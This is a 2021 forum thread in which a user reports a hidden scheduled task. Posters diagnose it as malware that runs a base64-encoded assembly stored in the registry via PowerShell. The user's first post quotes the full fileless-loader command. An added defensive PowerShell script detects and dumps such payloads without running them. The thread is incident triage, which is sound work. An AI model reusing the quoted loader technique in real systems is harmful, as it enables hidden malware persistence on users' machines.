something is trolling my pc? serious or harmless

Discussion in 'PC' started by EddieXx, Dec 30, 2021.

  1. EddieXx

    EddieXx Audiosexual

    Joined:
    Sep 13, 2015
    Messages:
    1,316
    Likes Received:
    761
    I don't often have weird things going on with my PC, but this time something is bothering me.

    It started with this PowerShell window (I think) opening up and closing suddenly, like a flash, every 10 or 15 min.

    So I thought maybe something was scheduled; I went to Scheduler and sure enough I found something. It went under the name of:
    Name: Wexlx
    Location: \
    Trigger: to be run every 10 minutes when started - activated
    Action: Start a program.
    Info: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software\Wexlx\).Jliadf)).EntryPoint.Invoke($Null,$Null)


    So I went to regedit and there is this "Wexlx" under "HKEY_CURRENT_USER" - "SOFTWARE" with two entries:

    Name (Standard) Type: REG_SZ (NO VALUE)
    Name Jliadf Type: REG_EXPAND_SZ

    (inside Jliadf there is a long-ass string; I found it easier to capture the screen)


    Any clue of what this can be?
     
    Last edited: Dec 30, 2021
  3. BEAT16

    BEAT16 Audiosexual

    Joined:
    May 24, 2012
    Messages:
    9,081
    Likes Received:
    7,009
    The photo is not displayed. Do you have a few pictures?
     
  4. uhub

    uhub Kapellmeister

    Joined:
    Dec 9, 2016
    Messages:
    181
    Likes Received:
    70
    Seems like adware, spyware or a cryptobot; it comes with any crack/keygen. Uninstall if you've installed any program from an unknown source recently and restore from a restore point... :like:

    I always disable PowerShell and use the CLI with admin rights instead, since the WannaCry malware was spread :guru:
     
  5. clone

    clone Audiosexual

    Joined:
    Feb 5, 2021
    Messages:
    7,567
    Likes Received:
    3,334
    Normally with Windows junk like this, the real trick in removal is getting the program to not execute at startup. Otherwise you would be able to delete any malicious files. Once it is loaded at startup you cannot.

    Say this one creates a registry entry. A lot of times the author knows you will find this, and then also writes lines into your win.ini, system.ini, and other places. You have to get rid of any reference which launches the app into memory.
     
  6. BEAT16

    BEAT16 Audiosexual

    Joined:
    May 24, 2012
    Messages:
    9,081
    Likes Received:
    7,009
    Take this one: AdwCleaner

    Free Download Malwarebytes AdwCleaner 8 full version standalone offline installer for Windows PC, the world’s most popular adware cleaner, finds and removes unwanted programs and junkware. Hence, your online experience stays optimal and hassle-free.

    https://filecr.com/windows/malwarebytes-adwcleaner/?id=6225444086
     
  7. Sylenth.Will.Fall

    Sylenth.Will.Fall Audiosexual

    Joined:
    Aug 21, 2015
    Messages:
    2,668
    Likes Received:
    1,846
    No, I don't, but a simple system restore should fix it.


    Sorry to step on your toes a bit with the system restore suggestion. I hadn't seen your post yet when typing mine.
     
  8. EddieXx

    EddieXx Audiosexual

    Joined:
    Sep 13, 2015
    Messages:
    1,316
    Likes Received:
    761
    Thanks for the heads-up. The task was created on Christmas Eve and I didn't even use the PC around those days, but it was turned on.

    The latest two programs with potential risk are a free EQ for OBS called "Blue Cat's Triple EQ", and, dumb enough, @ffinity ph@hoto and Designer (I needed to test something), one with a regular gen and the other with a fake gen of some sort. I thought I had stopped it in time and cleaned it up, but it could be that it is still present. Or the EQ.

    Other than that I haven't installed anything but updates to legit software for a very long time.
     
  9. nyaa13

    nyaa13 Producer

    Joined:
    Jul 21, 2019
    Messages:
    102
    Likes Received:
    75
  10. EddieXx

    EddieXx Audiosexual

    Joined:
    Sep 13, 2015
    Messages:
    1,316
    Likes Received:
    761
    Very observant of you to notice he worked with video too! It must be related.

    And that there is no other record of this, but that is interesting; I wonder wtf this can be that created an entry in the registry without any other record, HKCU:\Software\Wexlx\).Jliadf, besides the scheduled task..

    Too bad registry entries don't point to any location in the system.
     
    Last edited: Dec 30, 2021
  11. uhub

    uhub Kapellmeister

    Joined:
    Dec 9, 2016
    Messages:
    181
    Likes Received:
    70
    No, it's okay; rather I should be thanking you, as I had forgotten about Sylenth. After seeing your name I can recall the last one I downloaded was in the end part of 2016 from AoN. I will now update my Sylenth, haven't used that for a long time :like:

    Hmm, such nonsense is very sticky; once installed you can't get rid of it easily at all...

    Are your OS, hosts file, browser extensions and registry clean??? :dunno:

    Correct, another one is desktop.ini; every time I delete it, it comes back again in many places. Can you tell me how to delete .ini and .macosx files permanently??? :bow:
     
  12. Sylenth.Will.Fall

    Sylenth.Will.Fall Audiosexual

    Joined:
    Aug 21, 2015
    Messages:
    2,668
    Likes Received:
    1,846
    You're very welcome. Glad to be of assistance.
     
  13. EddieXx

    EddieXx Audiosexual

    Joined:
    Sep 13, 2015
    Messages:
    1,316
    Likes Received:
    761
    Well, I have been doing some research, scanning, cleaning and deleting.

    It shows that "Auslogics Duplicate File Finder" was causing some problems and probably some miner activity of some sort.

    I deactivated suspect auto-runs and deleted registry entries like "Wexlx", and it seems it was targeting PowerShell; to what purpose? Unknown.

    But I got rid of the problem. No more freezing PowerShell popping up so far.
     
  14. Xupito

    Xupito Audiosexual

    Joined:
    Jan 21, 2012
    Messages:
    7,292
    Likes Received:
    4,028
    Location:
    Europe
    This sounds a lot like malware. This line is converting that long string in the registry into a file and then loading (as a .dll) or executing it.

    Base64 is a way to convert and then write binary data (like files) in a text format. It's used in web programming, for instance.
    As long as you delete that fucker entry you should be good. Well done explaining your problem; you did your homework.
     
    Last edited: Dec 30, 2021
  15. r4e

    r4e Audiosexual

    Joined:
    Sep 6, 2014
    Messages:
    869
    Likes Received:
    1,247
    Do you still have that base64 entry from your picture?
    Would be nice to see what's inside. If yes, please send it to me.
     
  16. Xupito

    Xupito Audiosexual

    Joined:
    Jan 21, 2012
    Messages:
    7,292
    Likes Received:
    4,028
    Location:
    Europe
    I already feel bad for that Windows virtual machine... :rofl:
     
  17. EddieXx

    EddieXx Audiosexual

    Joined:
    Sep 13, 2015
    Messages:
    1,316
    Likes Received:
    761
    Wow, thanks Xupito, didn't know you had this insight. I really wanted to know what that meant/did, but I thought there was no point in asking here. I thought wrong, hehe.

    You mean the one in the registry? I can't copy the string. If it doesn't simply end like in the picture I posted earlier, it ends in those dots.... But maybe it's just because the string is too long?
     
    Last edited: Dec 30, 2021
  18. EddieXx

    EddieXx Audiosexual

    Joined:
    Sep 13, 2015
    Messages:
    1,316
    Likes Received:
    761
    BTW, I could export it! I uploaded it here as a text file; is that OK?

    https://filebin.net/gh4ggjatstqm066s
     
  19. r4e

    r4e Audiosexual

    Joined:
    Sep 6, 2014
    Messages:
    869
    Likes Received:
    1,247
    Yes, that's fine. While decoding, I immediately got a malware popup from my antivirus.
    Will take a deeper look. I hope you already deleted that key from the registry, because indeed
    it's an executable malware translated to base64.
    The PowerShell script most likely decodes that code into its executable form and runs it.

    Here are the scan results for that file:
    https://www.virustotal.com/gui/file...ba9e39a16ae6a27ffdfb943409557a22837/detection
     
    Last edited: Dec 30, 2021
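As an added example (not code from the thread or any of its posters), here is a PowerShell hunt for the pattern in the task action EddieXx posted and that Xupito and r4e describe: it lists scheduled tasks whose action feeds FromBase64String into Assembly::Load, reads the registry value the command references, decodes it to raw bytes without ever loading it, and writes the blob out with its SHA256 so it can be scanned offline or looked up on VirusTotal. The key path and value name are parsed from the task command; the dump location under $env:TEMP is an assumption.

```powershell
# Added example (not from the thread): hunt for scheduled tasks that load a
# base64-encoded assembly straight out of the registry, as the "Wexlx" task
# does, and dump the blob to disk for offline scanning without executing it.
# Assumes Windows PowerShell 5+ running as the user whose HKCU hive holds the key.

# The tell-tale pair seen in the task action: FromBase64String feeding Assembly::Load
$pattern = 'FromBase64String[\s\S]*Assembly\]::Load|Assembly\]::Load[\s\S]*FromBase64String'

$hits = Get-ScheduledTask | ForEach-Object {
    $task = $_
    foreach ($action in $task.Actions) {
        $cmd = "$($action.Execute) $($action.Arguments)"
        if ($cmd -match $pattern) {
            [pscustomobject]@{ Name = $task.TaskName; Path = $task.TaskPath; Command = $cmd }
        }
    }
}

if (-not $hits) {
    Write-Host 'No scheduled task action matches the base64-assembly pattern.'
}

foreach ($hit in $hits) {
    Write-Host "Suspicious task: $($hit.Path)$($hit.Name)"
    Write-Host "  Action: $($hit.Command)"

    # Pull the key path and value name out of the command, e.g.
    # (Get-ItemProperty HKCU:\Software\Wexlx\).Jliadf
    if ($hit.Command -match 'Get-ItemProperty\s+(?<key>[^\s)]+)\)\.(?<val>\w+)') {
        $key = $Matches.key; $val = $Matches.val
        $b64 = (Get-ItemProperty -Path $key -ErrorAction SilentlyContinue).$val
        if (-not $b64) { Write-Host "  $key\$val not present (already removed?)"; continue }

        # Decode to raw bytes only; this is never handed to Assembly::Load.
        $bytes = [Convert]::FromBase64String($b64)
        $isPE  = $bytes.Length -gt 2 -and $bytes[0] -eq 0x4D -and $bytes[1] -eq 0x5A   # 'MZ' header
        # Hash the bytes in memory first: AV may quarantine the dump the moment it is written (as r4e saw).
        $sha   = [BitConverter]::ToString([Security.Cryptography.SHA256]::Create().ComputeHash($bytes)) -replace '-'
        $out   = Join-Path $env:TEMP ("{0}_{1}.bin" -f $hit.Name, $val)   # assumed dump location
        [IO.File]::WriteAllBytes($out, $bytes)
        Write-Host "  Payload: $($bytes.Length) bytes, PE header present: $isPE"
        Write-Host "  Dumped to $out  SHA256=$sha  (look the hash up on VirusTotal / scan offline)"
        # Cleanup once confirmed, as the thread did: remove the task and the key.
        # Unregister-ScheduledTask -TaskName $hit.Name -TaskPath $hit.Path -Confirm:$false
        # Remove-Item -Path $key -Recurse
    }
}
```

Because the value is REG_EXPAND_SZ, Get-ItemProperty returns it with environment variables expanded, which is harmless for a base64 string; the decoded file is written to disk only for scanning, never run.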
  20. Xupito

    Xupito Audiosexual

    Joined:
    Jan 21, 2012
    Messages:
    7,292
    Likes Received:
    4,028
    Location:
    Europe
    It's only normal. First productive shit I say here in years :rofl:
    There are some really talented people when it comes to computers here, more than me. @r4e is one of them. I still remember that custom installer GUI for EZkeys, man!! :beg::shalom:
     
    Last edited: Dec 31, 2021
  21. Klangfarbe

    Klangfarbe Newbie

    Joined:
    Dec 30, 2021
    Messages:
    7
    Likes Received:
    2
    Hey, you could delete that desktop.ini a billion times; it will always come back. Has a simple reason.

    "The desktop.ini file is a hidden file used to store information about the arrangement of a Windows folder. Essentially, if the layout or settings for a folder are changed, a desktop.ini file is automatically generated to save those changes."


    So to answer your question: no, you can't delete these files permanently, it is a necessary part of Windows :yes:
     
    Last edited: Jan 6, 2022